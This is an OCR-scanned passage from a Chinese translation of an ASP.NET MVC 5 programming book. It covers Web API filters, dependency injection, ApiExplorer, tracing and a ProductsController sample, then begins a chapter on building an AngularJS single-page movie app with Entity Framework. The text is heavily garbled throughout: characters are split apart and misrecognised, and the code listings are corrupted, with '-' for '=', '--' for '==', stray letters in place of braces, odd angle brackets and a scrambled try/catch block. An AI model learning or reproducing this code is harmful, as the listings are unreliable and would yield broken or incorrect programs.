在 ASPNET MVC 中 ， 使 用 特性 过 滤 请 求 的 能 力 从 1.0 版 本 都 已 引入 ， 添 加 全 局 过 滤器 的 
能 力 在 MVC 3 中 引入 。ASPNET Web API 包 含 这 两 个 特征 ， 但 正如 前 面 讨论 的 ， 全 局 过 滤器 
在 配置 级 别 ， 而 不 在 应 用 程序 级 别 ， 因 为 Web API 中 没有 这 样 应 用 程序 范围 的 全 局 特征 。 

相对 于 MVC，Web API 的 改进 之 一 是 过 滤器 现在 是 异步 管道 的 一 部 分 ， 并 总 是 定义 成 异 
步 。 如 果 过 滤器 可 以 从 异步 中 获 益 ， 例 如 ， 记 录 异 步 数 据 源 (比如 数据 库 或 文件 系统 ) 的 异常 
失败 ， 然 后 就 可 以 这 样 做 。 然 而 ，Web API 团 队 也 意识 到 有 时 强制 编写 异步 代码 存在 不 必要 
的 开销 ， 所 以 开发 团队 也 创建 基于 特性 的 同步 基 类 ， 实 现 了 这 三 个 过 滤器 接口 。 当 移植 MVC 
过 滤器 时 ， 使 用 这 些 基 类 可 能 是 开始 最 简单 的 方式 。 如 果 过 滤器 需要 实现 过 滤器 管道 的 多 个 
阶段 ， 比 如 操作 过 滤器 和 异常 过 滤器 ， 就 没有 辅助 基 类 和 接口 需要 显 式 实现 。 

开发 人 员 可 以 针对 一 个 操作 在 操作 级 使 用 过 滤器 ， 也 可 以 针对 一 个 控制 器 的 所 有 操作 ， 
在 控制 器 级 别 使 用 过 滤器 ， 还 可 以 针对 配置 中 的 所 有 控制 器 和 所 有 操作 ， 在 配置 级 别 使 用 过 
滤器 ,Web API 包 含 一 个 过 滤器 供 开 发 人 员 使 用 AuthorizeAttribute。 与 MVC 对 应 特性 几乎 一 样 ， 
这 个 特性 可 用 来 装饰 需要 认证 的 操作 ， 并 且 该 特性 还 包括 可 以 选择 性 “撤消 ” 
AnuthorizeAttribute 的 AllowAnonymousAttribute。Web API 团 队 也 发 布 了 一 个 带 外 的 NuGet 包 来 
支持 一 些 OData 相 关 的 功能 ， 包 括 可 以 自动 支持 OData 查 询 语法 ( 像 Sop 和 $filter 查 询 字 符 串 值 ) 
的 QueryableAttribute。 

e IAuthenticationFilter: 身份 验证 过 滤器 能 够 标识 发 出 请 求 的 用 户 。 在 之 前 版 本 的 

ASP.NET MVC 和 Web API 中 ， 身 份 验证 过 滤器 很 难 插 拔 ， 必 须要 依赖 于 Web 服务 
器 的 内 置 行为 ， 或 者 指派 另外 一 个 过 滤器 阶段 ， 如 认证 。 身 份 验证 过 滤器 在 授权 过 滤 
器 之 前 运行 。 

e IAuthorizationFilter / AuthorizationFilterAttribute: 授权 过 滤器 可 以 在 参数 绑 定 发 生 以 前 
运行 。 它 们 用 于 过 滤 掉 对 于 操作 没有 合适 授权 的 请 求 。 授 权 过 滤器 先 于 操作 过 滤器 
运行 。 

e IActionFilter / ActionFilterAttribute: 操作 过 滤器 在 参数 绑 定 后 运行 ， 并 封装 了 对 API 
操作 方法 的 调用 ， 人 允许 在 调度 操作 之 前 ， 完 成 执行 之 后 拦截 。 操 作 过 滤器 的 目标 是 允 
许 开 发 人 员 增 加 和 /或 替换 操作 的 输入 值 和 /或 输出 结果 。 

e IExceptionFilter /ExceptionFilterAttribute: 当 调 用 的 操作 抛 出 异常 时 ， 就 会 调用 异常 过 
滤器 。 异常 过 滤器 可 以 检查 异常 ， 并 采取 一 些 操 作 ， 比 如 记录 日 志 ; 它 也 能 选择 地 通 
过 提供 新 的 响应 对 象 来 处 理 异 常 。 

在 Web API 中 ,没有 与 MVC 中 的 HandleError 等 价 的 特性 。MVC 对 错误 的 默认 行为 是 返回 
ASPNET“ 黄 屏 错误 ”， 当 应 用 程序 生成 HTML 时 , 这 是 正确 的 , 或 许 这 不 是 完全 用 户 友 好 的 。 
HandleBrror 竺 性 允许 MVC 开 发 人 员 使 用 自 定义 的 视图 替换 这 一 行为。 从 另 一 方面 来 说 ，Web 
API 应 该 始终 尝试 返回 结构 化 的 数据 ， 包 括 当 错误 条 件 满足 时 ， 它 拥有 内 置 的 支持 ， 把 错误 
信息 序列 化 反馈 给 终端 用 户 。 和 希望 重 写 这 一 行为 的 开发 人 员 可 以 编写 他 们 自己 的 错误 处 理 程 
序 过 滤器 ， 并 把 它 注册 在 配置 级 别 。 
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11.8 启用 依赖 注入 


ASPNET MVC 3 为 依赖 注入 容器 引入 了 有 限 的 支持 , 以 提供 内 置 MVC 服 务 和 成 为 非 服务 
类 ( 像 控制 器 和 视图 ) 工 厂 的 能 力 。Web API 已 经 效仿 类 似 的 功能 ， 但 有 两 个 关键 差异 。 

第 一 ，MVC 使 用 一 些 静态 类 作为 MVC 使 用 的 默认 服务 的 容器 。Web API 的 配置 对 象 为 这 
些 静 态 类 蔡 换 需求 ， 因 此 开发 人 员 可 以 查看 和 修改 通过 访问 HttpConfiguration.Services 列 举 的 
默认 服务 。 

B, Web API 的 依赖 解析 器 引入 了 “范围 ”的 概念 。 范 围 可 以 看 成 依赖 注入 容器 跟踪 
对 象 的 方式 ， 这 里 的 对 象 是 它 在 特定 上 下 文中 分 配 的 ， 这 样 我 们 就 可 以 很 容易 地 一 次 性 清除 
这 些 对 象 。Web API 的 依赖 解析 器 使 用 两 种 范围 : 

e 每 配置 (per-configuration) 范 围 一 一 全 局 服务 配置 ， 当 配置 清理 时 清除 。 

e 局 部 请 求 一 -针对 给 定 请 求 上 下 文中 创建 的 服务 ， 比 如 控制 器 使 用 的 服务 ， 当 请 求 完 

成 时 清除 。 
第 13 章 详细 介绍 了 在 MVC 和 Web API 中 如 何 使 用 依赖 注入 , 如果 想 详 细 地 学 习 , 请 参阅 。 


11.9 ”探索 API 编 程 
GET api/Values 


MVC 应 用 程序 的 控制 器 和 操作 通常 是 一 个 专门 事务 ， GET api/Values/(id) 
单独 设计 用 来 满足 应 用 程序 中 HTML 的 显示 需求 。 从 另 一 Parameters 
方面 来 说 ，Web API 倾 向 于 更 加 有 序 。 在 运行 时 发 掘 API use 
的 能 力 使 开发 人 员 能 够 和 Web API 应 用 程序 一 起 提供 关键 PVN NG 
功能 ， 其 中 包括 自动 生成 帮助 页 面 和 测试 客户 端 UI。 Hee 

JF EA fà WI M HttpConfiguration.Services 获取 PUT api/Values/(id) 
IApiExplorer 服 务 ， 并 用 它 来 编程 探索 服务 公开 的 API。 例 Parameters 


* id (FromUr) 


如 ，MVC 控 制 器 可 以 从 Web API 返 回 IApiExplorer 实 例 到 2 aue FromBody) 
Razor 代 码 片段 ， 列 举 所 有 可 用 的 AI 端点。 代码 的 输出 如 DELETE api/Values/(id) 
图 11-2 所 示 。 Parameters 

@model 图 11-2 


System.Web.Http.Description.IApiExplorer 


Gforeach (var api in Model.ApiDescriptions) ( 
«hl»8api.HttpMethod Gapi.RelativePath«/hl» 


if (api.ParameterDescriptions.Any()) ( 
«h2»Parameters«c/h2» 
«ul» 
(foreach (var param in api.ParameterDescriptions) ( 
«li»8param.Name (8param.Source)«/li» 
5 
</ul> 
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除了 自动 发 现 的 信息 之 外 ， 开 发 人 员 还 可 以 实现 IDocumentationProvider 接 口 来 使 用 文档 
文本 提供 API 描 述 ， 这 些 可 以 用 来 提供 丰富 的 信息 和 测试 客户 端 功能 。 由 于 文档 是 可 插 拔 的 ， 
开发 人 员 可 以 选择 以 任何 需要 的 格式 存储 这 些 文档 ， 包 括 特性 、 独 立 文件 、 数 据 库 表 或 其 他 
最 适合 应 用 程序 构建 过 程 的 格式 。 

要 想 查 看 使 用 这 些 API 功 能 的 一 个 更 加 完整 的 示例 ， 可 以 在 一 个 支持 MVC 和 Web API 的 
项 目 中 安装 Microsoft.AspNet.WebApi.HelpPage NuGet 包 。 对 于 想 要 为 Web API 提 供 自动 文档 的 
开发 人 员 ， 这 个 包 是 一 个 很 好 的 起 点 。 


11.10 ”跟踪 应 用 程序 


远程 部 署 代码 最 大 的 一 个 挑战 便 是 调试 远程 出 错 的 程序 。Web API 启 用 一 个 功能 丰富 的 
自动 跟踪 生态 系统 ， 虽 然 跟踪 系统 默认 是 关闭 的 ， 但 开发 人 员 可 以 根据 需要 开启 。 内 置 的 跟 
踪 功 能 封装 了 很 多 内 置 组 件 ， 可 关联 各 个 请 求 的 数据 ， 因 为 它 在 整个 系统 层 移动 。 

跟踪 的 核心 部 分 是 ITraceWriter 服 务 。Web API 没 有 附带 这 项 服务 的 任何 实现 ， 之 所 以 这 
FÉ, 是 因为 开发 人 员 预 计 可 能 已 经 有 他 们 自己 喜欢 的 跟踪 系统 ， 比 如 ETW、 log4net、 ELMAH 
或 其 他 许多 跟踪 系统 。 相 反 ，Web API 查 看 启动 ， 以 确定 是 否 在 服务 列表 中 有 ITraceWriter 的 
实现 ， 如 果 有 ， 会 自动 开始 跟踪 所 有 请 求 。 开 发 人 员 必 须 选 择 最 好 的 方式 来 存储 和 浏览 这 
些 跟踪 信息 一 一 通常 情况 下 ， 通 过 使 用 选择 的 日 志 系 统 提 供 的 配置 选项 来 选择 。 

应 用 程序 和 组 件 开 发 人 员 也 可 以 通过 检索 ITraceWriter 服 务 ( 如 果 不 为 null， 就 添加 跟踪 信 
息 ) 向 自己 开发 的 系统 中 添加 跟踪 支持 。 核 心 TTraceWriter 接 口 只 包含 一 个 Trace 方法 ， 但 也 有 
一 些 扩展 方法 ， 这 些 扩展 方法 使 得 跟踪 不 同 级 别 的 信息 (调试 、 信 息 、 警 告 、 错 误 和 致命 的 消 
息 ) 变 得 容易 ， 还 有 一 些 辅助 方法 可 跟踪 同步 和 异步 方法 的 进入 与 退出 。 


11.11 Web API 示例: ProductsController 


下 面 是 一 个 Web API 控 制 器 示例 ， 它 通过 Entity Framework 的 Code First 特 征 展示 了 一 个 简 
单数 据 对 象 。 为 了 支持 这 个 示例 ， 我 们 需要 三 个 文件 : 

e 模型 一 一 Product.cs( 程 序 清单 11-3) 

e 数据 库 上 下 文 一 一 DataContext.cs( 程 序 清单 11-4) 

e Web API 控制 器 一 一 ProductsController.cs( 程 序 清单 11-5) 


程序 清单 11-3 Product.cs 


public class Product 

{ 
public int ID { get; set; } 
public string Name { get; set; } 
public decimal Price { get; set; } 
public int UnitsInStock { get; set; } 
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程序 清单 11-4 DataContext.cs 


public class DataContext : DbContext 


t 
public DbSet«Product» Products ( get; set; ] 


程序 清单 11-5  ProductsController.cs 


public class ProductsController : ApiController 


t 
private DataContext db - new DataContext(); 


// GET api/Products 
public IEnumerable«Product» GetProducts() 
t 
return db.Products; 
) 


// GET api/Products/5 
public IHttpActionResult GetProduct (int id) 
t 
Product product - db.Products.Find(id); 
if (product -- null) 
t 
return NotFound(); 
H 
return Ok (product); 
) 


// PUT api/Products/5 
public IHttpActionResult PutProduct(int id, Product product) 
t 
if (ModelState.IsValid && id == product.ID) 
t 
db.Entry(product).State = EntityState.Modified; 
try 
{ 
db.SaveChanges () ; 
} 
catch (DbUpdateConcurrencyException) 
t 
return NotFound(); 
} 
return Ok (product); 
H 
else 


t 
Return BadRequest (ModelState); 


) 
// POST api/Products 


public IHttpActionResult PostProduct (Product product) 
t 
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if (ModelState.IsValid) 
t 
db.Products.Add (product); 
db.SaveChanges () ; 
var uri - new Uri( 
Url.Link( 
"DefaultApi", 


new ( id = product.ID ])); 


return Created(uri, product); 
} 
else 
{ 
Return BadRequest (ModelState); 
H 
} 


// DELETE api/Products/5 


public IHttpActionResult DeleteProduct (int id) 


t 


Product product - db.Products.Find(id); 


if (product -- null) 


return NotFound(); 
} 
db.Products.Remove (product); 
try 


db.SaveChanges (); 
} 


return NotFound(); 


return Ok (product); 
} 


catch (DbUpdateConcurrencyException) 


protected override void Dispose (bool disposing) 


{ 
db.Dispose(); 


base.Dispose (disposing) ; 


11.42. 小结 


ASPNET Web API 是 一 个 功能 强大 的 新 方式 ， 可 以 月 


晶 来 向 我 们 已 有 的 或 新 创建 的 Web 应 


用 程序 中 添加 API。MVC 开 发 人 员 会 发 现 熟悉 的 基于 控制 器 的 编程 模型 ，WCF 开 发 人 员 会 发 
现 与 基于 MVC 的 服务 系统 相 比 ，Web API 对 Web 托 管 和 自 托管 的 支持 是 一 个 额外 的 红利 。 当 
与 NET 4.5 的 async 和 await 结 合 使 用 时 ， 异 步 设计 允许 我 们 的 Web API 得 到 高 效 扩展 ， 同 时 可 


以 维护 一 个 舒适 的 顺序 编程 模型 。 
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本 章 主要 内 容 

e 理解 和 安装 AngularJS 

e 如 何 构建 Web API 

e 如 何 构建 应 用 程序 和 模型 


本 章 代码 下 载 
在 以 下 网 址 的 Download Code 选 项 卡 中 ， 可 下 载 本 章 的 代码 : http//www.wrox.com/ 
go/proaspnetmvc5。 本 章 的 代码 包含 在 文件 AtTheMovies.C12.zip 中 。 


本 书 前 面部 分 已 经 介绍 了 如 何 结合 jQuery 和 ASPNET MVC 5 构建 交互 的 Web 页 面 。 
jQuery 虽然 是 一 个 强大 的 库 ， 可 以 用 来 选择 并 操作 DOM 元 素 、 绑 定 事 件 、 与 Web 服 务 器 通 
信 ， 但 它 也 有 自身 的 一 些 局 限 性 ， 例 如 ， 它 不 能 提供 任何 结构 、 模 式 和 抽象 来 处 理 真实 的 
HTML5 客 户 端 应 用 程序 。 

HTML 应 用 程序 ， 也 有 人 称 之 为 单 页 面 应 用 程序 或 SPA(Single Page Application)， 是 一 
个 复杂 的 事物 ,典型 的 浏览 器 应 用 程序 在 管理 数据 方面 都 是 首先 从 服务 器 请 求 原始 的 JSON 
数据 ， 然 后 把 请 求 的 JSON 数 据 转 换 成 HTML， 同 时 从 页 面 的 UI 控件 中 检索 输入 数据 ， 然 后 
把 输入 数据 推送 到 JavaScript 对 象 中 。 此 外 ， 还 有 一 些 浏 览 器 应 用 程序 通过 把 HIML 块 加 载 
到 DOM 对 象 中 来 管理 多 个 视图 ， 同 时 DOM 也 要 求 应 用 程序 管理 浏览 历史 来 实现 前 进 和 后 
退 功 能 。 要 在 客户 端 实现 这 些 功 能 ， 我 们 需要 像 在 服务 器 端的 MVC 模 式 一 样 分 离 关 注 点 ， 
以 免 代 码 变 成 不 可 控 的 混乱 代码 。 

管理 复杂 性 的 技术 通常 都 是 创建 一 个 可 以 隐藏 复杂 性 的 框架 。 截 止 到 目前 ， 已 经 出 现 
了 很 多 客户 端 TavaScript 框 架 ， 比 如 Durandal、EmberJS 和 AngularJS， 这 些 框 架 各 有 千秋 ， 
建议 都 尝试 一 下 ， 然 后 选择 适合 自己 的 框架 使 用 。 本 章 重 点 详细 介绍 AngularJS 框 架 ， 主 要 
包括 AngularJS 如 何 与 ASPNET 结 合 起 来 工作 ， 以 及 它 如 何在 不 需要 复杂 代码 的 情况 下 创建 
强大 的 Web 应 用 程序 。 


第 12 章 ”应 用 AngularJS 构 建 单 页 面 应 用 程序 


首先 ， 向 ASPNET MVC 5 应 用 程序 中 添加 AngularJS， 然 后 创建 向 AngularJS 提 供 数据 
的 API。 采 用 AngularJS 的 双向 数据 绑 定 功能 可 以 实现 页 面 数据 的 展示 和 编辑 ， 最 后 探讨 
AngularJS 中 的 一 些 核心 抽象 ， 比 如 控制 器 、 模 型 、 模 块 和 服务 。 


— | 
© 注意 ”本章 示例 代码 包含 在 文件 AtTheMovies-master.zip 中 。 | 


12.1 理解 和 安装 AngularJS 


本 节 首 先 介绍 AngularJS 的 重要 性 以 及 本 章 的 目标 ,然后 学 习 如 何 安装 AngularJS， 以 及 
如 何 向 网 站 添加 AngularJS 。 


12.1.1 AngularJS 简 介 


AngularJS 是 由 Google 的 一 个 团队 开发 的 JavaScript 框 架 。 该 团队 创建 了 一 个 可 扩展 、 可 
测试 的 框架 ， 而 且 功能 非常 强大 ， 支 持 数据 绑 定 、 服 务 器 间 通 信 、 视 图 管理 、 历 史 管理 、 
定位 、 验 证 等 。AngularJS( 以 下 简称 Angular) 也 使 用 控制 器 、 模 型 和 视图 ， 这 些 对 于 使 
ASPNET MVC 的 读者 应 该 熟悉 ,因为 ASPNET MVC 中 也 有 控制 器 、 模 型 和 视图 这 些 概念 。 
但 不 同 的 是 ，Angular 都 是 关于 JavaScript 和 HTML， 而 不 是 C# 和 Razor。 

为 什么 要 在 客户 端 使 用 模型 、 视 图 和 控制 器 呢 ? 其 实 和 在 服务 器 端 使 用 的 原因 一 
样 一 一 维持 代码 的 顺序 ， 把 不 同 功能 分 在 不 同 的 抽象 中 。 下 面 介 绍 Angular 的 工作 原理 ， 首 
先 安装 Angular。 


12.4.2 ”本 章 目标 


本 章 的 示例 代码 创建 了 一 个 可 以 管理 电影 列表 的 浏览 器 应 用 程序 , 可 以 看 作 MVC 音 乐 
商店 的 扩展 。 用 户 可 以 创建 、 更 新 、 罗 列 和 展示 电影 的 详细 信息 ， 这 些 功 能 的 实现 不 用 
ASPNET MVC 视 图 创建 HTML， 只 需要 使 用 Angular 管 理 不 同 的 视图 。 不 同 的 视图 也 不 需 
要 导航 到 不 同 的 URL， 只 需要 在 浏览 器 的 一 个 页 面 中 展示 。 此 外 ， 也 不 需要 从 服务 器 发 送 
HTML， 只 需要 调用 Web API 控 制 器 来 交换 JSON 数 据 ， 然 后 把 客户 端的 JSON 数 据 转换 成 
HTML. 


12.4.8 AT] 


首先 ， 需 要 在 Visual Studio 2013 中 创建 一 个 新 的 ASPNET 应 用 程序 ， 命 名 为 
atTheMovies， 如 图 12-1 所 示 。 

这 个 项 目 中 的 许多 视图 都 使 用 HTML 文 件 构建 ， 客 户 端 大 多 数 情 况 都 是 从 服务 器 请 求 
JSON 数 据 ， 初 始 请 求 除外 。 最 能 满足 这 种 需求 的 模板 是 Web API 项 目 模板 ， 该 模板 可 以 在 
下 一 个 窗 体 中 选择 ， 如 图 12-2 所 示 。 注 意 ，Web API 模 板 也 有 ASPNET MVC 支 持 ， 但 只 提 
供 一 个 首页 作为 起 始点 。 对 于 应 用 程序 的 需求 ， 这 样 做 是 很 完美 的 。 

创建 项 目 之 后 ， 运 行 应 用 程序 ， 就 可 以 看 到 运行 中 的 首页 ， 如 图 12-3 所 示 。 
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现在 我 们 可 以 配置 首页 ， 配 置 之 后 就 可 以 使 用 Angular。 
12.1.4 ”向 网 站 中 添加 AngularJS 


安装 Angular 的 方法 有 多 种 。 如 果 比 较 注 重 Angular 的 版 本 和 功能 ， 就 可 以 到 Angular 网 
站 (angularjs-org) 直 接 下 载 脚本 文件 。 然 而 ， 最 简便 的 方法 是 使 用 NuGet 和 包 管 理 控制 台 。 


Install-Package AngularJS.core 


AngularJS.core 包 会 在 项 目的 Scripts 文 件 夹 中 安装 许多 新 的 脚本 文件 。 其 中 ， 最 重要 的 
文件 是 angularjs 文 件 ( 如 图 12-4 所 示 ), 因为 该 文件 中 包含 
Angular 框 架 的 核心 部 分 。 DUE CO - 

下 一 步 是 把 核心 的 Angular 脚 本 添加 到 应 用 程序 中 ， prr E 
这 样 就 能 在 浏览 器 中 访问 到 它 。 一 些 应 用 程序 可 能 在 站 
点 的 Layout 视 图 中 已 经 包含 了 Angular 脚 本 ， 但 是 并 非 每 
个 页 面 都 需要 Angular， 这 样 浏览 器 就 加 载 了 宛 余 的 脚 
本 。 解决 这 个 问题 的 方法 是 只 把 Angular 脚 本 放 在 那些 会 
成 为 客户 端 应 用 程序 的 页 面 中 。 在 这 个 ASPNET MVC 
MEAP, 我 们 可 以 通过 修改 主页 的 Index.cshtml 视 图 来 使 
HomeController 包 含 Angular。 事 实 上 ， 我 们 可 以 删除 
Index 视 图 中 的 标记 ， 用 下 面 的 代码 取而代之 : 


(section scripts ( 
«script src-"-/Scripts/angular.js"»«/script» 


b 
b 
b 
b 
r 
b 
» 


) 


«div ng-app» 
{{2+3}} 

</div> 

向 主页 添加 Angular 的 操作 非常 简单 ， 因 为 默认 的 布局 视图 包含 一 个 名 为 “scripts” 的 
节 ， 这 样 我 们 就 可 以 直接 把 脚本 标签 放 在 页 面 的 底部 。 此 外 ， 也 可 以 使 用 ASPNET 的 绑 定 
和 微小 功能 来 压缩 Angular 脚 本 , 但 是 这 样 就 需要 在 前 面 的 代码 中 使 用 脚本 标签 指定 一 个 源 
码 文件 。 

上 面 列 表 中 的 div 包 含 一 个 有 趣 的 特性 ng-app, 也 就 是 一 个 Angular 指 令 , 它 允 许 Angular 
使 用 新 功能 扩展 HTML。 需要 注意 的 是 ，Angular 核 心 指令 都 有 一 个 “ng” 前 级 ， 这 里 “ng” 
即 是 Angular 的 简写 。 本 章 后 面 还 会 介绍 更 多 的 指令 ， 但 目前 我 们 只 需要 知道 ng-app 是 
Angular 的 应 用 程序 引导 指令 。 换 而 言 之 ，ng-app 告 知 Angular 跳 入 并 初始 化 应 用 程序 ， 并 寻 
找 其 他 内 部 指令 和 模板 来 控制 DOM 节 ， 这 一 过 程 通常 被 称 作 编译 DOM。 

此 外 ， 上 述 列表 中 还 包含 模板 {{2+ 3}}。 双 花 括 号 表示 是 HIML 中 的 模板 ，Angular 
应 用 程序 自动 查找 模板 ， 并 计算 里 面 JavaScript 表 达 式 的 值 。 如 果 运 行 应 用 程序 ， 我 们 就 
会 看 到 Angular 加 载 ， 因 为 它 会 用 5 代 蔡 模板 {{2+3}}， 如 图 12-5 所 示 。 
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localhost:42035/Home/Indexd 


62013 - My ASP.NET Application 


图 12-5 
上 述 代码 的 变形 如 下 ; 
«div data-ng-app> 
((true ? "true" : "false"]) 
«/div» 
有 以 下 两 个 不 同 点 : 
e 这 里 用 data-ng-app 代替 了 ng-app. Angular 允许 我 们 使 用 data- 作 为 特性 指令 的 前 级 ， 
这 一 点 和 HTML5 规范 一 致 。 
e 模板 中 使 用 了 JavaScript 三 元 操作 符 。 模 板 允 许 我 们 使 用 JavaScript 语言 的 子 集 来 
表达 在 DOM 中 实现 的 功能 。 在 第 二 个 例子 中 ， 输 出 内 容 是 字符 串 true。 
截止 目前 举 的 例子 可 能 使 模板 看 起 来 太 简单 而 不 实用 ， 但 是 后 面 会 介绍 模板 如 何 提 
供 HTML 视 图 和 JavaScript 对 象 模型 之 间 强 大 的 双向 数据 绑 定 。 如 果 用 户 在 视图 中 修改 了 
值 , 例如 在 输入 控件 中 输入 内 容 ，Angular 会 自动 地 把 这 些 输入 的 值 推送 到 JavaScript 对 象 
模型 中 。 同 样 地 ， 如 果 使 用 服务 器 的 新 内 容 更 新 了 模型 对 象 ，Angular 也 会 自动 地 把 更 新 
推送 到 视图 。 
由 此 可 见 ， 客 户 端 应 用 程序 编写 起 来 非常 容易 ， 因 为 不 需要 手动 同步 模型 和 视图 之 
间 的 数据 。 使 用 ASPNET MVC 模 型 和 视图 ， 服 务 器 端的 同步 问题 是 不 需要 担心 的 ， 因 为 
我 们 把 模型 推送 到 视图 ， 创 建 HTML， 然 后 发 送 HTML 到 客户 端 。 数 据 从 不 同步 ， 因 为 
我 们 只 使 用 一 次 模型 。 
客户 端 应 用 程序 是 不 同 的 ， 因 为 DOM 和 Web 页 面 是 有 状态 的 。 当 用 户 修改 数据 时 ， 
我 们 需要 把 修改 的 数据 推送 给 模型 对 象 ， 反 之 亦 然 。 在 学 习 模板 如 何 帮助 实现 数据 自动 
同步 之 前 ， 我 们 需要 一 些 示 例 数 据 ， 这 些 示例 数据 意味 着 我 们 还 需要 服务 器 端的 代码 和 
数据 库 。 
12.1.55 “数据库 设 置 


由 于 用 来 创建 这 个 项 目的 模板 默认 不 包含 Entity Framework， 因 此 我 们 需要 返回 于 
Package Manager Console 窗 口 ， 运 行 下 面 的 命令 : 


Install-Package EntityFramework 


Entity Framework 会 把 数据 存储 在 SQL Server 数 据 库 中 。 什 么 数据 呢 ? 在 Models 文 件 夹 
中 添加 Movie 类 ， 这 个 类 中 的 信息 就 是 要 存储 在 数据 库 中 的 数据 。 


public class Movie 
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public int Id ( get; set; } 
public string Title ( get; set; } 
public int ReleaseYear ( get; set; } 
public int Runtime ( get; set; } 

} 


此 外 ， 还 需要 DbContext 派 生 类 ， 并 在 其 中 添加 一 个 DbSet 类 型 的 属性 来 实现 对 电影 对 
象 的 添加 、 删 除 和 查询 。 


public class MovieDb : DbContext 
{ 

public DbSet«Movie» Movies ( get; set; } 
} 


回 到 Package Manager Console， 启 用 Entity Framework 迁 移 。 
迁移 允许 我 们 管理 数据 库 模式 ， 修 改 数据 库 模式 。 然 而 ， 本 章 只 在 仅 有 初始 数据 的 数 
据 库 上 使 用 迁移 。 在 控制 台 执行 如 下 命令 : 


Enable-Migrations 


迁移 会 在 项 目 中 创建 Migrations 文 件 夹 ， 并 在 此 文件 夹 中 创建 Configuration.cs 文 件 。 
在 Configuration.cs 文 件 中 ， 会 有 一 个 拥有 Seed 方 法 的 类 。 把 下 面 的 代码 添加 到 Seed 方 法 
中 ， 这 样 数据 库 中 就 填充 了 三 个 电影 对 象 。 


protected override void Seed(MovieDb context) 
t 
context.Movies.AddOrUpdate (m-»m.Title, 
new Movie 
t 
Title-"Star Wars", ReleaseYear-1977, Runtime-121 
u 
new Movie 
t 
Title-"Inception", ReleaseYear-2010, Runtime-148 
um 
new Movie 
t 
Title-"Toy Story", ReleaseYear-1995, Runtime-81 
H 
) 7 


H 


我 们 也 可 以 启用 自动 迁移 , 进一步 简化 添加 新 特征 的 过 程 。 自 动迁 移 默 认 是 关闭 的 ， 
但 是 在 Migrations 文 件 夹 中 的 Configuration 类 的 构造 函数 中 可 以 找到 相应 配置 来 开启 自 
动迁 移 。 

public Configuration() 

t 


AutomaticMigrationsEnabled = true; 
} 


配置 之 后 ,我 们 就 可 以 在 Package Manager Console 窗 口中 使 用 update-database 命 令 创 建 
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数据 库 。 输 出 截屏 如 图 12-6 所 示 。 


Package source: | NuGet official package source -| d 


Paciage Moraze O 
图 12-6 


完成 数据 库 配 置 之 后 ， 接 下 来 就 可 以 创建 API 来 操作 和 检索 数据 库 中 的 数据 。 


12.2 创建 Web API 


创建 Web API 的 操作 非常 简单 ， 因 为 只 需要 实现 基本 的 创建 、 读 取 、 更 新 和 删除 操作 ， 
Visual Studio 2013 提 供 的 基 架 功能 可 以 自动 生成 实现 这 些 操作 需要 的 代码 。 步 骤 如 下 : 

(1) 右 击 Controllers 文 件 夹 ， 选 择 Add | Controller， 打 开 Add Scaffold 对 话 框 ， 如 图 12-7 
所 示 。 


Mig MvcS Controler Empty Web API 2 Controller with actions, using 


prie 
Prg, MCS Controler with resdhonite actione E 
Abico with REST acions to 
ust d ipit diae andes 
zm 


—— reste, 
po cae fom an Enty Famevod d 


如 Web API 2 Controller - Empty Jd: ApiControlleWithContestScaffolder. 
Go Web API 2 Controller with actions, using Entity Framework 


如 Wa API 2 Controler wih rendte actions 


Rs Web API 2 OData Controller with actions using Entity Framework 


图 12-7 


(2) 选择 “Web API 2 Controller with read/write actions, using Entity Framework” 选 项 ， 
然后 单 击 Add 按 钮 ， 打 开 Add Controller 对 话 框 ， 如 图 12-8 所 示 。 

(3) 将 新 控制 器 命名 为 MovieController。 模 型 类 是 前 面 创建 的 Movie 类 ，Data 上 下 文 类 
是 MovieDb 类 。 单 击 Add 按 钮 之 后 ，Visual Studio 中 就 会 出 现 MovieController cs 文件 。 
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Controller name: 


Default] Controller 


C Use async controller actions 
Model class: 


Data contet dass: 


图 12-8 


(4) 运行 应 用 程序 ， 并 在 浏览 器 中 导航 到 /api/movies。 就 能 看 到 电影 信息 编码 成 了 
XMI 或 JSON， 具 体 是 哪 一 种 编码 方式 取决 于 浏览 器 ， 如 图 12-9 所 示 。 


| lecalhost4203S/api/mov. x 
€ > Q Dlocalhost4203 


This XML file does not appear to have any style information associated with it The document tree ^ 
is shown below. 


图 12-9 


现在 已 经 完成 了 服务 器 端的 编码 ， 本 章 后 面部 分 会 重点 介绍 客户 端 代码 和 Angular]S。 


12.3 创建 应 用 程序 和 模块 


到 目前 为 止 , 我 们 已 经 在 网 站 的 首页 创建 了 一 个 简单 的 Angular 应 用 程序 ， 通过 单一 模 
板 实现 了 简单 表达 式 结果 的 输出 。 如 果 要 扩展 管理 电影 的 功能 ， 我 们 还 需要 一 个 合适 的 应 
用 程序 模块 。 

Angular 中 的 模块 是 一 个 抽象 概念 ， 它 可 以 帮助 分 组 组 件 ， 使 各 个 组 件 独立 于 应 用 程序 
中 的 其 他 组 件 和 代码 片段 。 这 样 便于 Angular 代 码 进行 单元 测试 , 测试 的 简易 性 是 框架 创建 
者 设 定 要 实现 的 一 个 重要 目标 。 

Angular 框 架 的 各 个 特性 组 成 了 构建 应 用 程序 需要 的 不 同 模块 。 但 是 ,在 使 用 这 些 模块 
之 前 ， 还 需要 针对 应 用 程序 自 定义 一 个 模块 。 

具体 步骤 如 下 : 

(1) 在 项 目 中 创建 一 个 新 文件 夹 , 命名 为 Client。 一些 人 可 能 把 这 个 文件 夹 命名 为 App， 
其 实 ， 这 里 文件 夹 的 名 称 无 关 紧 要 ， 可 以 把 它 命 名 为 任意 名 称 。 创 建新 文件 夹 的 目的 是 把 
主页 应 用 程序 的 脚本 组 织 到 一 个 专门 的 文件 夹 中 ， 而 不 是 使 用 Scripts 文 件 夹 存放 所 有 的 
JavaScript 脚 本 。 为 了 方便 代码 的 维护 ,我们 通常 会 把 C 礁 原 码 放 在 对 应 不 同 的 文件 和 文件 夹 
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中 ， 同 样 的 规则 也 适用 于 JavaScript， 当 需要 创建 非常 大 的 客户 端 应 用 程序 时 ， 也 需要 把 脚 
本 放 在 不 同 的 文件 夹 中 。 

(2) 在 Client 文 件 夹 中 创建 一 个 子 文件 夹 ， 命 名 为 Scripts。 在 Scripts 文 件 夹 中 ， 创 建 一 
个 JavaScript 文 件 ， 命 名 为 atTheMovies.js， 并 在 atTheMoviesjs 中 输入 如 下 代码 : 


(function () { 
var app = angular .module ("atTheMovies", []1); 
FOI? 


变量 angular 是 全 局 Angular 对 象 。 和 jQuery API 通 过 全 局 变量 $ 获 取 一 样 ，Angular 通 过 
